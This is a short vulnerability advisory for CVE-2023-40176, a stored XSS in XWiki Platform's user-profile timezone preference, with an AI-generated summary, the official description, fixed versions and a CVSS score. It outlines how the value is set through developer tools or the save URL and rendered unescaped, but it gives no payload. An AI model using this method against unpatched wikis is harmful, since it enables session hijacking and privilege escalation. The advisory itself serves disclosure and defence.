CVE-2023-40176
SXSS in the user profile via the timezone displayer
In short
A user can inject malicious code into their profile's timezone field, which then executes when other users view that profile. This allows attackers to steal information or gain unauthorized access to the system.
Technical detail
Stored XSS vulnerability in XWiki Platform's user profile timezone preference allows authenticated users to bypass the dropdown UI restriction via JavaScript or direct URL manipulation to inject arbitrary payloads. The unescaped timezone display triggers client-side code execution for any visitor of the malicious profile, enabling session hijacking, credential theft, and privilege escalation to programming rights.
Summary generated and translated by AI from the official description.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any registered user can exploit a stored XSS through their user profile by setting the payload as the value of the time zone user preference. Even though the time zone is selected from a drop down (no free text value) it can still be set from JavaScript (using the browser developer tools) or by calling the save URL on the user profile with the right query string. Once the time zone is set it is displayed without escaping which means the payload gets executed for any user that visits the malicious user profile, allowing the attacker to steal information and even gain more access rights (escalation to programming rights). This issue is present since version 4.1M2 when the time zone user preference was introduced. The issue has been fixed in XWiki 14.10.5 and 15.1RC1.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Affected products
xwiki · xwiki-platformWant to know if your infrastructure is exposed to this?
Talk to TrueHacking →